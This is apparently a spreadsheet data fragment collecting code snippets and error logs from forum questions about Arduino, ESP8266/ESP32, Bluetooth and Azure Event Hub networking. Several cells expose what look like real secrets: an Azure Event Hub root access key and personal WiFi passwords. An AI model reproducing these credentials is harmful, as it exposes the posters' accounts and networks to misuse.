      Serial.println("");
  }      
  Serial.println("End of the program, enter any key to restart it.</t>
  </si>
  <si>
    <t>#define HTTP_HEADER_OFFSET 163
#define MAX_STRINGS 20
#define MAX_STRING_LENGTH 8
#define REQUEST_EVERY_X_MS 5000
/* Setup for Ethernet Library */
static byte mymac[] = { 0x74, 0x69, 0x69, 0x2D, 0x30, 0x31 };
const char website[] PROGMEM = "www.arksecurity.net16.net"; 
const char device[] = "0001"; 
char test[MAX_STRINGS][MAX_STRING_LENGTH+1];
String test2 = "1234";
char * comp[20];
uint8_t receivedResponse;
unsigned long timer;
byte Ethernet::buffer[700];
static void response_callback (byte status, word off, word len) {
    int i_string = 0;
    int i_char = 0;
    int i_ethBuff = off + HTTP_HEADER_OFFSET;
    char carat;
    for (i_ethBuff = off + HTTP_HEADER_OFFSET; (carat =(char)Ethernet::buffer[i_ethBuff]) != 0; i_ethBuff++)
    {
        if (carat == '\n')
        { // New line char = new string
            if (i_string &lt; MAX_STRINGS - 1){
                i_string++;
                i_char = 0;
                }
            else
                break; 
        }
        else
        {
            if (i_char &lt; MAX_STRING_LENGTH)
            {
                test[i_string][i_char] = carat;
                i_char++;
            } // otherwise discard the char (max length of string reached)
        }
    }
  receivedResponse = 1;
}
void setup() {
  if (ether.begin(sizeof Ethernet::buffer, mymac, 8) == 0)
  {
    Serial.println("Failed to access Ethernet controller");
    while(1);
  }
  else
    Serial.println("Ethernet controller initialized");
  Serial.println();
  if (!ether.dhcpSetup())
  {
    Serial.println("Failed to get configuration from DHCP");
    while(1);
  }
  else
    Serial.println("DHCP configuration done");
  if (!ether.dnsLookup(website))
  {
    Serial.println("DNS failed");
    while(1);
  }
  else 
    Serial.println("DNS resolution done"); 
  ether.printIp("SRV IP:\t", ether.hisip);
  Serial.println();
  timer = millis() - REQUEST_EVERY_X_MS;
}
void loop() {    
  word pos = ether.packetLoop(ether.packetReceive());
  if (millis() - timer &gt; REQUEST_EVERY_X_MS){
    timer += REQUEST_EVERY_X_MS;
    receivedResponse = 0;
    ether.browseUrl(PSTR("/DevicesQuery.php?device="),device , website, response_callback);
while (!receivedResponse);
for(int i=0; i &lt; 20 - 1; i++){
      comp[i] = test[i];
      if(test2.equals(comp[i])){
      Serial.println("OK");
        }
        else
        Serial.println("Wrong");
       } 
    }
}
Edit4: Made it work with another comparison.</t>
  </si>
  <si>
    <t>'s idea, this is my complete new code:
#include &lt;ESP8266WiFi.h&gt;
#include &lt;Ticker.h&gt;
/* Put your SSID &amp; Password */
const char* ssid = "NodeMCU";  // Enter SSID here
const char* password = "12345678";  //Enter Password here
/* Put IP Address details */
IPAddress local_ip(192,168,1,1);
IPAddress gateway(192,168,1,1);
IPAddress subnet(255,255,255,0);
WiFiServer server(80);                    
const int CLIENT_TIMEOUT = 2000;
Ticker Data_Rec;
bool Sending_40ms_Start_Flag = false;
void setup() {
  Serial.begin(115200);
  pinMode(D0, OUTPUT);
  WiFi.softAP(ssid, password);
  WiFi.softAPConfig(local_ip, gateway, subnet);
  delay(100);
  server.begin();
  Serial.println("HTTP server started");
    Data_Rec.attach_ms(500, flag_enable);//500ms is for test
}
void flag_enable(){
    //Read FPGA Data from SPI
    //...
    Sending_40ms_Start_Flag = true;
}
void loop(){
    WiFiClient client = server.available();
    if (client) {
        while(client.connected()){
        Serial.println("40ms_Data B");
            if (Sending_40ms_Start_Flag){          
              client.println("Server listening.\r"); 
              Sending_40ms_Start_Flag = false;                            
            }
            delay(1);//without this delay, ESP would be reset(because it cannot handle background processes)
         }
//         else{
//           client.stop();
//         }
      }
}
This code worked.</t>
  </si>
  <si>
    <t>setup done");
      Serial.println();
      Serial.println("SLAVE SETTINGS");
      ether.printIp("IP: ",ether.myip);
      ether.printIp("DNS: ", ether.dnsip);
      //ether.printIp("GW: ",ether.gwip);    ether.printIp("Mask: ", 
                                                          ether.mymask);
      Serial.println();
      // Add SENSOR_IREG register - Use addIreg() for analog Inputs
      mb.addIreg(HeartBeat);
      Serial.print("HeartBeatSensor added at address: "); 
      Serial.println(HeartBeat);
      mb.addIreg(Oxygen);
      Serial.print("OxygenSensor added at address: "); 
      Serial.println(Oxygen);
}
void loop() {
   //Call once inside loop() - all magic here
   mb.task();
   //Testcode
   for(int i=0;i&lt;400; i++)
   {
       mb.Ireg(HeartBeat, i);
       mb.Ireg(Oxygen,i+2000);
       Serial.println(i);
       delay(2000);
   }
}
Output (debug) slave: 
Arduino debug
I am able to get connection between the PLC and a Modbus Slave simulator (and exchange data), but when I try to connect the arduino I can't seem to get a connection.</t>
  </si>
  <si>
    <t>This is the log for successful non-secure connection:
And this is for  failed secure connection:
&gt; ws = websocket.createClient()
&gt; ws:on("connection", function()
&gt;&gt; print('connection opened', status)
end)
&gt; ws:on("receive", function(_, msg, opcode)
print('got message:', msg, opcode) -- opcode is 1 for text message, 2 for binary
end)
&gt; ws:on("close", function(_, status)
&gt;&gt; print('connection closed', status)
ws = nil -- required to lua gc the websocket client
end)
&gt; ws:connect('wss://echo.websocket.org/')
&gt; connection closed -128
Is secure websocket not supported in nodemcu ?</t>
  </si>
  <si>
    <t>");
  }
  Serial.println("");
  Serial.println("WiFi connected");
  Serial.println("IP address: ");
  Serial.println(WiFi.localIP());
  // END: Wifi connection
}
int temp=15;
void loop() {
   WiFiClientSecure client;
  if (!client.connect(HOST, 443)) {
    Serial.println("connection failed");
    return;
  }
   data= "[{'Temperature':25.25 , 'Deviceid':'esp3'} , {'Temperature':30.30 , 'Deviceid':'esp3'}]";  // for batch events  
  // data = "{'Temperature':25.25 , 'Deviceid':'esp3'}"; // for single events 
   request = String("POST ")+"https://rishieventhub2.servicebus.windows.net" + END_POINT + "?timeout=60&amp;api-version=2014-01" + " HTTP/1.1\r\n" +
               "Host: " + HOST + "\r\n" +
               "Authorization: SharedAccessSignature " + fullSas + "\r\n" +                
               "Content-Type: application/vnd.microsoft.servicebus.json" +"\r\n" + 
               "Content-Length: " + data.length() + "\r\n\r\n" +
               data;
    Serial.println(request);
    client.print(request);
 delay(100);
}</t>
  </si>
  <si>
    <t>Error logs are given below
This is the whole code 
#include &lt;WiFi.h&gt;
#include &lt;BLEDevice.h&gt;
#include &lt;BLEAdvertisedDevice.h&gt;
#include &lt;MySQL_Connection.h&gt;
#include &lt;MySQL_Cursor.h&gt;
/*
  INSERT CREDENTIALS
*/
char ssid[] = "";    // your SSID
char pass[] = "";       // your SSID Password
IPAddress server_addr(192, 168, 1, xx); // IP of the MySQL *server* here
char user[] = "";              // MySQL user login username
char password[] = "";        // MySQL user login password
IPAddress local_IP(192, 168, 1, xx); // ESP 32 IP
IPAddress gateway(192, 168, 1, xx); // GATEWAY
IPAddress subnet(255, 255, 255, 0); // SUBNET
IPAddress primaryDNS(192, 168, 1, xx); // DNS
WiFiClient client;
MySQL_Connection conn((Client *)&amp;client);
int LED_BUILTIN = 2;
int scanTime = 10;
int RSSI_data;
int device_count = 0;
char MAC_data[17];
char query[128];
const char *dev_name;
const char *uuid_string;
class MyAdvertisedDeviceCallbacks: public BLEAdvertisedDeviceCallbacks {
    void onResult(BLEAdvertisedDevice advertisedDevice) {
    }
};
char INSERT_DATA[] = "INSERT INTO yoklama.esp3_table (rssi, mac_address, device_name, dev_uuid) VALUES (%d,'%s','%s','%s')";
void setup()
{
  Serial.begin(115200);
  if (!WiFi.config(local_IP, gateway, subnet, primaryDNS)) {
    Serial.println("STA Failed to configure");
  }
  Serial.print("Connecting to ");
  Serial.println(ssid);
  WiFi.begin(ssid, pass);
  while (WiFi.status() != WL_CONNECTED) {
    delay(500);
    Serial.print(".</t>
  </si>
  <si>
    <t>Connections :
Code:
// This is a demo of the RBBB running as webserver with the Ether Card
// 2010-05-28 &lt;jc@wippler.nl&gt; http://opensource.org/licenses/mit-license.php
#include &lt;EtherCard.h&gt;
// ethernet interface mac address, must be unique on the LAN
static byte mymac[] = { 0x74, 0x69, 0x69, 0x2D, 0x30, 0x31 };
static byte myip[] = { xxx, xxx, 216, 203 };
static byte gwip[] = { xxx, xxx, 216, 126 };
static byte dnsip[] = { 8, 8, 8, 8};
static byte netmask[] = { 255, 255, 255, 0};
byte Ethernet::buffer[500];
BufferFiller bfill;
void setup () {
  Serial.begin(9600);
  if (ether.begin(sizeof Ethernet::buffer, mymac, 53) == 0)
    Serial.println(F("Failed to access Ethernet controller"));
  ether.staticSetup(myip, gwip, dnsip, netmask);
  while (ether.clientWaitingGw())
    ether.packetLoop(ether.packetReceive());
  Serial.println("\nGateway found");
  Serial.print("ether.clientWaitingGw=");// just to test
  Serial.print(ether.clientWaitingGw());
}
void loop () {
  word len = ether.packetReceive();
  word pos = ether.packetLoop(len);
  if (pos) { // check if valid tcp data is received
    ether.httpServerReply(homePage());// send web page data
    Serial.println("\nSend web data");
  }
delay(1000);
}
static word homePage() {
  long t = millis() / 1000;
  word h = t / 3600;
  byte m = (t / 60) % 60;
  byte s = t % 60;
  bfill = ether.tcpOffset();
  bfill.emit_p(PSTR(
                 "HTTP/1.0 200 OK\r\n"
                 "Content-Type: text/html\r\n"
                 "Pragma: no-cache\r\n"
                 "\r\n"
                 "&lt;meta http-equiv='refresh' content='1'/&gt;"
                 "&lt;title&gt;RBBB server&lt;/title&gt;"
                 "&lt;h1&gt;$D$D:$D$D:$D$D&lt;/h1&gt;"),
               h / 10, h % 10, m / 10, m % 10, s / 10, s % 10);
  return bfill.position();
}
Output: 
XXX.XXX.216.203
XXX.XXX.216.126
8.8.8.8
255.255.255.0
Gateway found
Fail to send web data</t>
  </si>
  <si>
    <t># file: rfcomm-server.py
# auth: Albert Huang &lt;albert@csail.mit.edu&gt;
# desc: simple demonstration of a server application that uses RFCOMM sockets
#
# $Id: rfcomm-server.py 518 2007-08-10 07:20:07Z albert $
from bluetooth import *
server_sock=BluetoothSocket( RFCOMM )
server_sock.bind(("",PORT_ANY))
server_sock.listen(1)
port = server_sock.getsockname()[1]
uuid = "94f39d29-7d6d-437d-973b-fba39e49d4ee"
advertise_service( server_sock, "SampleServer",
                   service_id = uuid,
                   service_classes = [ uuid, SERIAL_PORT_CLASS ],
                   profiles = [ SERIAL_PORT_PROFILE ], 
#                   protocols = [ OBEX_UUID ] 
                    )
print("Waiting for connection on RFCOMM channel %d" % port)
client_sock, client_info = server_sock.accept()
print("Accepted connection from ", client_info)
try:
    while True:
        data = client_sock.recv(1024)
        if len(data) == 0: break
        print("received [%s]" % data)
except IOError:
    pass
print("disconnected")
client_sock.close()
server_sock.close()
print("all done")</t>
  </si>
  <si>
    <t>Client: 
Server:
#include &lt;ESP8266WiFi.h&gt;
#include &lt;WiFiUDP.h&gt;
unsigned int UDPPort = 2390;      // local port to listen on
char packetBuffer[255]; //buffer to hold incoming packet
char  ReplyBuffer[] = "acknowledged";       // a string to send back
WiFiUDP Udp;
void setup() {
    Serial.begin(115200);
  WiFi.softAP("Wi-Fi");
  Udp.begin(UDPPort);
  Serial.println();
    Serial.println("Started ap.</t>
  </si>
  <si>
    <t>Other addresses for localhost (not scanned): 127.0.0.1
Not shown: 996 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
5002/tcp open  rfe
Nmap done: 1 IP address (1 host up) scanned in 4.80 seconds
ftp localhost
&gt; ftp localhost
Connected to localhost.</t>
  </si>
  <si>
    <t>("192.168.1.178")
byte gateway[] = { 192, 168, 1, 130 };                   // internet access via router
byte subnet[] = { 255, 255, 255, 0 };                  //subnet mask
EthernetServer server(8080);                             //server port     
String readString;
void setup() {
 // Open serial communications and wait for port to open:
  Serial.begin(9600);
   while (!Serial) {
    ; // wait for serial port to connect.</t>
  </si>
  <si>
    <t>The code used to create the socket is as follows:
Logcat output is as follows:
06-20 14:29:42.224: DEBUG/RPiService(24273): ---------- [ CONNECTION ESTABLISHED ] ----------
06-20 14:29:42.224: DEBUG/RPiService(24273): connected, Socket Type:Secure
06-20 14:29:42.229: DEBUG/RPiService(24273): create ConnectedThread: Secure
06-20 14:29:43.734: DEBUG/RPiService(24273): setState() 2 -&gt; 3
06-20 14:29:43.739: DEBUG/RPiService(24273): Connection reset by peer
06-20 14:29:43.744: WARN/System.err(24273): java.io.IOException: Connection reset by peer
06-20 14:29:43.754: WARN/System.err(24273): at android.bluetooth.BluetoothSocket.writeNative(Native Method)
06-20 14:29:43.759: WARN/System.err(24273): at android.bluetooth.BluetoothSocket.write(BluetoothSocket.java:398)
06-20 14:29:43.764: WARN/System.err(24273): at android.bluetooth.BluetoothOutputStream.write(BluetoothOutputStream.java:85)
06-20 14:29:43.769: WARN/System.err(24273): at com.example.BluetoothTest.RPiService$ConnectedThread.run(RPiService.java:344)
On the side of the RPi, I am essentially running the following example server script from the PyBluez package:
from bluetooth import *
server_sock=BluetoothSocket( RFCOMM )
server_sock.bind(("",PORT_ANY))
server_sock.listen(1)
port = server_sock.getsockname()[1]
uuid = "00001101-0000-1000-8000-00805F9B34FB"
advertise_service( server_sock, "SampleServer",
    service_id = uuid,
    service_classes = [ uuid, SERIAL_PORT_CLASS ],
    profiles = [ SERIAL_PORT_PROFILE ]
)
print "Waiting for connection on RFCOMM channel %d" % port
client_sock, client_info = server_sock.accept()
print "Accepted connection from ", client_info
try:
    while True:
        data = client_sock.recv(1024)
        if len(data) == 0: break
        print "received [%s]" % data
except IOError:
    pass
print "disconnected"
client_sock.close()
server_sock.close()
print "all done"
I've tried various UUIDs suggested by posts I read on SO including 00001101-0000-1000-8000-00805F9B34FB, 94f39d29-7d6d-437d-973b-fba39e49d4ee and 00000003-0000-1000-8000-00805F9B34FB (always the same on both ends of the connection).</t>
  </si>
  <si>
    <t>Mon Jan 12 20:24:24 2015 kern.info kernel: [   16.474564] smsc95xx 1-1.1:1.0 eth0: hardware isn't capable of remote wakeup
Mon Jan 12 20:24:24 2015 kern.info kernel: [   16.487272] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready
Mon Jan 12 20:24:24 2015 kern.info kernel: [   16.501795] device eth0 entered promiscuous mode
Mon Jan 12 20:24:24 2015 kern.info kernel: [   16.513802] IPv6: ADDRCONF(NETDEV_UP): br-lan: link is not ready
Mon Jan 12 20:24:24 2015 daemon.notice netifd: Interface 'lan' is enabled
Mon Jan 12 20:24:24 2015 daemon.notice netifd: Interface 'loopback' is enabled
Mon Jan 12 20:24:24 2015 daemon.notice netifd: Interface 'loopback' is setting up now
Mon Jan 12 20:24:24 2015 daemon.notice netifd: Interface 'loopback' is now up
Mon Jan 12 20:24:25 2015 daemon.notice netifd: Network device 'lo' link is up
Mon Jan 12 20:24:25 2015 daemon.notice netifd: Interface 'loopback' has link connectivity 
Mon Jan 12 20:24:25 2015 kern.info kernel: [   17.052676] cfg80211: Calling CRDA for country: IE
Mon Jan 12 20:24:25 2015 kern.info kernel: [   17.085261] cfg80211: Regulatory domain changed to country: IE
Mon Jan 12 20:24:25 2015 kern.info kernel: [   17.096057] cfg80211:  DFS Master region: ETSI
Mon Jan 12 20:24:25 2015 kern.info kernel: [   17.100492] cfg80211:   (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp), (dfs_cac_time)
Mon Jan 12 20:24:25 2015 kern.info kernel: [   17.119584] cfg80211:   (2402000 KHz - 2482000 KHz @ 40000 KHz), (N/A, 2000 mBm), (N/A)
Mon Jan 12 20:24:25 2015 kern.info kernel: [   17.132433] cfg80211:   (5170000 KHz - 5250000 KHz @ 80000 KHz), (N/A, 2000 mBm), (N/A)
Mon Jan 12 20:24:25 2015 kern.info kernel: [   17.145262] cfg80211:   (5250000 KHz - 5330000 KHz @ 80000 KHz), (N/A, 2000 mBm), (0 s)
Mon Jan 12 20:24:25 2015 kern.info kernel: [   17.157918] cfg80211:   (5490000 KHz - 5710000 KHz @ 80000 KHz), (N/A, 2700 mBm), (0 s)
Mon Jan 12 20:24:25 2015 kern.info kernel: [   17.170695] cfg80211:   (57240000 KHz - 65880000 KHz @ 2160000 KHz), (N/A, 4000 mBm), (N/A)
Mon Jan 12 20:24:26 2015 daemon.info dnsmasq[572]: started, version 2.71 cachesize 150
Mon Jan 12 20:24:26 2015 daemon.info dnsmasq[572]: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP no-DHCPv6 no-Lua TFTP no-conntrack no-ipset no-auth no-DNSSEC
Mon Jan 12 20:24:26 2015 daemon.info dnsmasq[572]: using local addresses only for domain lan
Mon Jan 12 20:24:26 2015 daemon.warn dnsmasq[572]: no servers found in /tmp/resolv.conf.auto, will retry
Mon Jan 12 20:24:26 2015 daemon.info dnsmasq[572]: read /etc/hosts - 1 addresses
Mon Jan 12 20:24:26 2015 kern.info kernel: [   18.092150] smsc95xx 1-1.1:1.0 eth0: link up, 100Mbps, full-duplex, lpa 0xCDE1
Mon Jan 12 20:24:26 2015 kern.info kernel: [   18.123934] br-lan: port 1(eth0) entered forwarding state
Mon Jan 12 20:24:26 2015 kern.info kernel: [   18.134427] br-lan: port 1(eth0) entered forwarding state
Mon Jan 12 20:24:26 2015 kern.info kernel: [   18.144931] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
Mon Jan 12 20:24:26 2015 daemon.notice netifd: Network device 'eth0' link is up
Mon Jan 12 20:24:26 2015 daemon.notice netifd: Bridge 'br-lan' link is up
Mon Jan 12 20:24:26 2015 daemon.notice netifd: Interface 'lan' has link connectivity 
Mon Jan 12 20:24:26 2015 daemon.notice netifd: Interface 'lan' is setting up now
Mon Jan 12 20:24:26 2015 kern.info kernel: [   18.173112] IPv6: ADDRCONF(NETDEV_CHANGE): br-lan: link becomes ready
Mon Jan 12 20:24:26 2015 daemon.notice netifd: lan (596): udhcpc (v1.22.1) started
Mon Jan 12 20:24:27 2015 daemon.notice netifd: lan (596): Sending discover...
Mon Jan 12 20:24:27 2015 kern.info kernel: [   18.596370] ieee80211 phy0: rt2x00lib_request_firmware: Info - Loading firmware file 'rt2870.bin'
Mon Jan 12 20:24:27 2015 kern.info kernel: [   18.613990] ieee80211 phy0: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.29
Mon Jan 12 20:24:27 2015 daemon.notice netifd: lan (596): Sending select for 192.168.0.2...
Mon Jan 12 20:24:27 2015 daemon.notice netifd: lan (596): Lease of 192.168.0.2 obtained, lease time 86400
Mon Jan 12 20:24:27 2015 kern.info kernel: [   19.109731] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
Mon Jan 12 20:24:27 2015 kern.info kernel: [   19.138177] device wlan0 entered promiscuous mode
Mon Jan 12 20:24:27 2015 daemon.notice netifd: Interface 'lan' is now up
Mon Jan 12 20:24:27 2015 user.notice firewall: Reloading firewall due to ifup of lan (br-lan)
Mon Jan 12 20:24:28 2015 daemon.info dnsmasq[572]: exiting on receipt of SIGTERM
Mon Jan 12 20:24:28 2015 daemon.info dnsmasq[664]: started, version 2.71 cachesize 150
Mon Jan 12 20:24:28 2015 daemon.info dnsmasq[664]: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP no-DHCPv6 no-Lua TFTP no-conntrack no-ipset no-auth no-DNSSEC
Mon Jan 12 20:24:28 2015 daemon.info dnsmasq[664]: using local addresses only for domain lan
Mon Jan 12 20:24:28 2015 daemon.info dnsmasq[664]: reading /tmp/resolv.conf.auto
Mon Jan 12 20:24:28 2015 daemon.info dnsmasq[664]: using local addresses only for domain lan
Mon Jan 12 20:24:28 2015 daemon.info dnsmasq[664]: using nameserver 192.168.0.1#53
Mon Jan 12 20:24:28 2015 daemon.info dnsmasq[664]: read /etc/hosts - 1 addresses
Mon Jan 12 20:24:28 2015 daemon.info dnsmasq[664]: read /tmp/hosts/dhcp - 1 addresses
Mon Jan 12 20:24:28 2015 kern.info kernel: [   20.127335] br-lan: port 1(eth0) entered forwarding state
Mon Jan 12 20:24:37 2015 kern.info kernel: [   28.573163] br-lan: port 2(wlan0) entered forwarding state
Mon Jan 12 20:24:37 2015 kern.info kernel: [   28.583842] br-lan: port 2(wlan0) entered forwarding state
Mon Jan 12 20:24:37 2015 kern.info kernel: [   28.594422] IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready
Mon Jan 12 20:24:37 2015 daemon.notice netifd: Network device 'wlan0' link is up
Mon Jan 12 20:24:37 2015 daemon.notice netifd: lan (596): Performing a DHCP renew
Mon Jan 12 20:24:37 2015 daemon.notice netifd: lan (596): Sending renew...
Mon Jan 12 20:24:37 2015 daemon.notice netifd: lan (596): Lease of 192.168.0.2 obtained, lease time 86400
Mon Jan 12 20:24:39 2015 kern.info kernel: [   30.577330] br-lan: port 2(wlan0) entered forwarding state
Mon Jan 12 20:25:21 2015 authpriv.info dropbear[740]: Child connection from 192.168.0.212:55899
Mon Jan 12 20:25:55 2015 authpriv.notice dropbear[740]: Password auth succeeded for 'root' from 192.168.0.212:55899
Mon Jan 12 20:26:29 2015 daemon.warn odhcpd[390]: DHCPV6 SOLICIT IA_NA from 000300016c709fd34a7d on br-lan: no addresses available 
Mon Jan 12 20:26:29 2015 daemon.info dnsmasq[664]: read /etc/hosts - 1 addresses
Mon Jan 12 20:26:29 2015 daemon.info dnsmasq[664]: read /tmp/hosts/odhcpd - 0 addresses
Mon Jan 12 20:26:29 2015 daemon.info dnsmasq[664]: read /tmp/hosts/dhcp - 1 addresses</t>
  </si>
  <si>
    <t>Here's the source for the rest of my code (with the original FSBrowser library):
Primary ino file
//Header File
#include "HHIO_Portal.h"
//Function used to verify incoming information from the teensy to the wifi card via the communication protocol
void recInfoWifi()
{
    /*
    ===============================
    COMMUNICATION PROTOCOL - Removed due to post size limit
    ===============================
    */
} //end comProtocolWifi
//Function used to send information to the teensy in order to control the HHIO PTT
void sendInfoWifi()
{
    unsigned long currTime = millis();
    //SEND
    if(currTime - prevTimeTest &gt; testInterval)   
    {
        prevTimeTest = currTime; 
        //Test Message
        messageLength = 3;
        subsys = SUBSYS_DBG;
        messageContent = wifiCounter; 
        //Teensy Console
        Serial.write(som);
        Serial.write(messageLength);
        Serial.write(subsys);
        Serial.write(messageContent);
        Serial.write(eom);
        wifiCounter++;
    } //end if (RECEIVE INFO)
} //end function sendInfoWifi
void setup()
{ 
  //Initiate Serial connection to Teensy
  Serial.begin(115200);
  //This is for debugging/housekeeping (And all console messages that use mySerial as opposed to Serial)
  mySerial.begin(115200);
  /*
  ===============================
  FILE SYSTEM
  ===============================
  */
  SPIFFS.begin();
  {
    Dir dir = SPIFFS.openDir("/");
    while (dir.next()) {    
      String fileName = dir.fileName();
      size_t fileSize = dir.fileSize();
      if(mySerial)
        mySerial.printf("FS File: %s, size: %s\n", fileName.c_str(), formatBytes(fileSize).c_str()); 
    } //end while
        if(mySerial)
            mySerial.printf("\n"); 
  } //end SPIFFS BEGIN  
  /*
  ===============================
  WIFI INIT
  ===============================
  */
  if(mySerial)
    mySerial.printf("Connecting to %s\n", ssid); 
  //Make the initial Wifi connection
  if (String(WiFi.SSID()) != String(ssid)) {
    WiFi.begin(ssid, password);
  } //end if
 //Wait for the Wifi to finish connecting
  while (WiFi.status() != WL_CONNECTED) {
    delay(500);
    if(mySerial)
      mySerial.print(".</t>
  </si>
  <si>
    <t>");
  }
  Serial.println("");
  Serial.println("WiFi connected");
  Serial.println("IP address: ");
  Serial.println(WiFi.localIP());
  // END: Wifi connection
}
int temp=15;
void loop() {
   WiFiClientSecure client;
  if (!client.connect(HOST, 443)) {
    Serial.println("connection failed");
    return;
  }
  //data= "[{'Temperature':25.25 , 'Deviceid':'esp3'} , {'Temperature':30.30 , 'Deviceid':'esp3'}]";  // for batch events  
   data = "{'Temperature':25.25 , 'Deviceid':'esp3'}"; // for single events 
   request = String("POST ")+"https://rishieventhub2.servicebus.windows.net" + END_POINT + "?timeout=60&amp;api-version=2014-01" + " HTTP/1.1\r\n" +
               "Host: " + HOST + "\r\n" +
               "Authorization: SharedAccessSignature " + fullSas + "\r\n" +                
               "Content-Type: application/atom+xml;type=entry;charset=utf-8\r\n" + 
               "Content-Length: " + data.length() + "\r\n\r\n" +
               data;
    Serial.println(request);
    client.print(request);
 delay(100);
The code for sending single events works and i am able to store the values in table storage and i can see using azure table storage.</t>
  </si>
  <si>
    <t>A connection attempt failed because the connected party did not
  properly respond after a period of time, or established connection
  failed because connected host has failed to respond.</t>
  </si>
  <si>
    <t>");
  }
  Serial.println("Connected to AP");
}
Serial.print("Connecting to ThingsBoard node ...");
// Attempt to connect (clientId, username, password)
if ( client.connect("fa5c6fe0-05cc-11e9-bfc6-27e4379bb947", TOKEN, 
  NULL,NULL,NULL,NULL,NULL,NULL) ) {
  Serial.println( "[DONE]" );
} else {
  Serial.print( "[FAILED] [ rc = " );
  Serial.print( client.state() );
  Serial.println( " : retrying in 5 seconds]" );
  // Wait 5 seconds before retrying
  delay( 5000 );
  }
 }
} 
Please let me know in case I am missing any configuration or doing something wrong.</t>
  </si>
  <si>
    <t>the exception I get is:
A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.</t>
  </si>
  <si>
    <t>", "+CREG: 0,1", 2000) == 0);
    // sets APN , user name and password
    sendATcommand("AT+SAPBR=3,1,\"Contype\",\"GPRS\"", "OK", 2000);
    snprintf(aux_str, sizeof(aux_str), "AT+SAPBR=3,1,\"APN\",\"%s\"", apn);
    sendATcommand(aux_str, "OK", 2000);
    snprintf(aux_str, sizeof(aux_str), "AT+SAPBR=3,1,\"USER\",\"%s\"", user_name);
    sendATcommand(aux_str, "OK", 2000);
    snprintf(aux_str, sizeof(aux_str), "AT+SAPBR=3,1,\"PWD\",\"%s\"", password);
    sendATcommand(aux_str, "OK", 2000);
    // gets the GPRS bearer
    while (sendATcommand("AT+SAPBR=1,1", "OK", 20000) == 0)
    {
        delay(5000);
    }
}
void loop(){
    // gets GPS data
    get_GPS();
    // sends GPS data to the script
    send_HTTP();
    delay(5000);
}
void power_on(){
    uint8_t answer=0;
    // checks if the module is started
    answer = sendATcommand("AT", "OK", 2000);
    if (answer == 0)
    {
        // power on pulse
        digitalWrite(onModulePin,HIGH);
        delay(3000);
        digitalWrite(onModulePin,LOW);
        // waits for an answer from the module
        while(answer == 0){  
            // Send AT every two seconds and wait for the answer   
            answer = sendATcommand("AT", "OK", 2000);    
        }
    }
}
int8_t start_GPS(){
    unsigned long previous;
    previous = millis();
    // starts the GPS
    sendATcommand("AT+CGPSPWR=1", "OK", 2000);
    sendATcommand("AT+CGPSRST=0", "OK", 2000);
    // waits for fix GPS
    while(( (sendATcommand("AT+CGPSSTATUS?</t>
  </si>
  <si>
    <t>here's the code which i am trying to send batch events 
#include &lt;ESP8266WiFi.h&gt;
#include &lt;WiFiClientSecure.h&gt;
#include &lt;String.h&gt;
#include "sha256.h"
#include "Base64.h"
// START: Azure Evet Hub settings
const char* KEY = "dhGE6MbbRLe6IPZs6dOHd3byQlEJ8YzqnW+uBAT7T/Q=";   // main event hub key 
const char* KEY_NAME = "RootManageSharedAccessKey";                 //  key name
const char* HOST = "rishieventhub2.servicebus.windows.net";         //  event hub name
const char* END_POINT = "/rishidata/messages";                      // name of eventhub created inside event hub
// END: Azure Evet Hub settings
// START: WiFi settings
const char* SSID = "Nokia";
const char* PASSWORD = "rishikesh";
// END: WiFi settings
String request;
String data;
String fullSas;
 WiFiClientSecure client;
void setup() {
  Serial.begin(115200);
  Serial.println();
  Serial.println();
  // START: Naive URL Encode
  String url = "https://" + (String)HOST + (String)END_POINT;
  url.replace(":", "%3A");
  url.replace("/", "%2F");
  Serial.println(url);
  // END: Naive URL Encode
  // START: Create SAS
  // https://azure.microsoft.com/en-us/documentation/articles/service-bus-sas-overview/
  // Where to get secods since the epoch: local service, SNTP, RTC
  int expire = 1711104241;
  String stringToSign = url + "\n" + expire;
  // START: Create signature
  Sha256.initHmac((const uint8_t*)KEY, 44);
  Sha256.print(stringToSign);
  char* sign = (char*) Sha256.resultHmac();
  int signLen = 32;
  // END: Create signature
  // START: Get base64 of signature
  int encodedSignLen = base64_enc_len(signLen);
  char encodedSign[encodedSignLen];
  base64_encode(encodedSign, sign, signLen); 
  String encodedSas = (String) encodedSign;
  // Naive URL encode
  encodedSas.replace("=", "%3D");
  Serial.println(encodedSas);
  // END: Get base64 of signature
  // SharedAccessSignature
   fullSas = "sr=" + url + "&amp;sig="+ encodedSas + "&amp;se=" + expire +"&amp;skn=" + KEY_NAME;
  // END: create SAS
  // START: Wifi connection
  Serial.print("connecting to ");
  Serial.println(SSID);
  WiFi.begin(SSID, PASSWORD);
  while (WiFi.status() != WL_CONNECTED) {
    delay(1000);
    Serial.print(".</t>
  </si>
  <si>
    <t>Exception: A connection attempt failed because the connected party did
  not properly respond after a period of time, or established connection
  failed because connected host has failed to respond
I am deploying the same project in PC IIS, it run smoothly.</t>
  </si>
  <si>
    <t>#include "WiFiClientSecure.h"
#include "Camera_Exp.h"
CAMERA cam;
char ssid[] = "";
char pass[] = "";  
#define SENSOR 19
#define SERVER     ""
#define PORT     443
#define BOUNDARY     "--------------------------133747188241686651551404"  
#define TIMEOUT      20000
void setup() 
{
 pinMode(SENSOR,INPUT);
  Serial.begin(115200);
  Serial.println("\r\nHello Line Notify");
  cam.setFrameSize(CAMERA_FS_QVGA);
  cam.setMirror(false);
  cam.setVflip(false);
  cam.setWhiteBalance(true);
  esp_err_t err = cam.init();
  if (err != ESP_OK)
  {
    Serial.println("Camera init failed with error =" + String( err));
    return;
  }
  WiFi.begin(ssid, pass);
  unsigned char led_cnt=0;
  while (WiFi.status() != WL_CONNECTED) 
  {
     Serial.print(".</t>
  </si>
  <si>
    <t>//int x =0;
byte ledPin = 2;
char ssid[] = "RedmiNote5";           // SSID of your home WiFi//
char pass[] = "Dheeraj@247";            // password of your home WiFi
unsigned long askTimer = 0;
IPAddress server(192,168,43,80);       // the fix IP address of the server
WiFiClient client;
void setup() {
